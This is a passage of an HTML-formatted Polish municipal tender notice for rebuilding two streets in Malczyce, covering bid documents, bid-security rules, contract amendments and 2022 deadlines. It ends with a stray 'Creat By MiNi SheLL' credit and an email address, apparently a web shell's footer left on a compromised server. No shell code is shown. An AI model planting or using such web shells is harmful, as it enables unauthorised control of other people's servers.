budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór<br/>wykazu stanowi załącznik nr 4 do SWZ).<br/>2. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Oferty przygotowany zgodnie ze wzorem podanym w Załączniku nr 1 SWZ,<br/>2. Kosztorys uproszczony,<br/>3. Oświadczenie/oświadczenia Wykonawcy/Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia/podmiotów udostępniających zasoby o niepodleganiu wykluczeniu,<br/>spełnianiu warunków udziału w postępowaniu - wypełnione zgodnie z Załącznikiem nr 2 do SWZ,<br/>4. Pełnomocnictwo / Pełnomocnictwa dla osoby / osób podpisujących ofertę, jeżeli oferta jest<br/>podpisana przez pełnomocnika (o ile upoważnienie to nie wynika z innych dokumentów<br/>dołączonych do oferty),<br/>5. Zobowiązania innych podmiotów do udostępnienia zasobów, jeśli Wykonawca korzysta z<br/>zasobów innych podmiotów.<br/>6. dowód wniesienia wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości:<br/>Część nr 1 - 20 000,00 PLN<br/>Część nr 2 - 8 500,00 PLN<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2.<br/>Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1)pieniądzu;<br/>2)gwarancjach bankowych;<br/>3)gwarancjach ubezpieczeniowych;<br/>4)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r.<br/>poz. 310, 836 i 1572)<br/>Wadium musi zostać wniesione przed upływem terminu składania ofert. Wadium wniesione w<br/>pieniądzu musi być na wskazanym koncie w dniu i godzinie składania ofert wskazanym w<br/>dalszej części SWZ.<br/>Wadium wnoszone w pieniądzu musi zostać wpłacone przelewem na rachunek bankowy<br/>Zamawiającego, Gmina Malczyce; ul. Traugutta 15, 55-320 Malczyce nr konta<br/>37958900030006195520000030 z zaznaczeniem: wadium; Przebudowa ulicy Traugutta oraz ulicy Strażackiej w Malczycach (część nr …… ).<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2-<br/>4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej.<br/>Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>1)upływu terminu związania ofertą;<br/>2)zawarcia umowy w sprawie zamówienia publicznego;<br/>3)unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia<br/>Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w<br/>formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4, występuje odpowiednio<br/>do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>1)wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z<br/>przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub<br/>przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57<br/>lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub<br/>oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3,<br/>co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako<br/>najkorzystniejszej;<br/>2)wykonawca, którego oferta została wybrana:<br/>a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w<br/>ofercie,<br/>b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących<br/>po stronie wykonawcy, którego oferta została wybrana.<br/>Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>1)upływu terminu związania ofertą;<br/>2)zawarcia umowy w sprawie zamówienia publicznego;<br/>3)unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>zwraca wadium wykonawcy:<br/>1)który wycofał ofertę przed upływem terminu składania ofert;<br/>2)którego oferta została odrzucona;<br/>3)po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana<br/>jako najkorzystniejsza;<br/>4)po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zaliczka przekazywana Wykonawcy w wysokości 5%<br/>wynagrodzenia, pozostała część wynagrodzenia wypłacana po zakończeniu realizacji Inwestycji; <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie<br/>pod rygorem nieważności takiej zmiany w niżej wymienionych przypadkach:<br/>1. Zmiany terminu realizacji z powodu:<br/>a. wystąpienia siły wyższej tj. wydarzenia nieprzewidywalnego (np. złych warunków<br/>atmosferycznych deszcz, śnieg, grad – zgodnie z wiedzą i warunkami technicznymi) i<br/>poza kontrolą stron niniejszej umowy, występującej po podpisaniu umowy, a powodującego<br/>niemożność wywiązania się z umowy w jej obecnym brzmieniu.<br/>b. Wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo<br/>zachowania należytej staranności, np. działania osób trzecich uniemożliwiające wykonanie<br/>zamówienia w terminie umownym, które to działania nie są konsekwencją winy którejkolwiek ze<br/>stron.<br/>c. istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na<br/>niezgodności dokumentacji z przepisami prawa;<br/>d. uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia<br/>proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla<br/>Zamawiającego;<br/>e. wystąpienia robót lub zamówień dodatkowych, niemożliwych do przewidzenia przed<br/>zawarciem umowy;<br/>f. z powodu niekorzystnych warunków atmosferycznych, które uniemożliwiają realizację<br/>przedmiotu umowy zgodnie z obowiązującymi przepisami (warunkami technicznymi – normami);<br/>g. zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności<br/>spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi<br/>lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy;<br/>h. konieczność uzyskania uzgodnień, decyzji,pozwoleń, opinii – w terminach przekraczających<br/>terminy ustawowe;<br/>i. zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści<br/>umowy do aktualnego stanu prawnego;<br/>2. Zmiany wynagrodzenia, w przypadku:<br/>a. zmiany technologii wykonania robót, na wniosek Wykonawcy lub Zamawiającego i pod<br/>warunkiem, że zmiana ta będzie korzystna dla Zamawiającego;<br/>b. odstąpienia na wniosek Zamawiającego od realizacji części przedmiotu zamówienia.<br/>Szczegółowy zakres zmian został ujęty we wzorze umowy, stanowiącym załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-30 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://malczyce.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-30 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-28</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com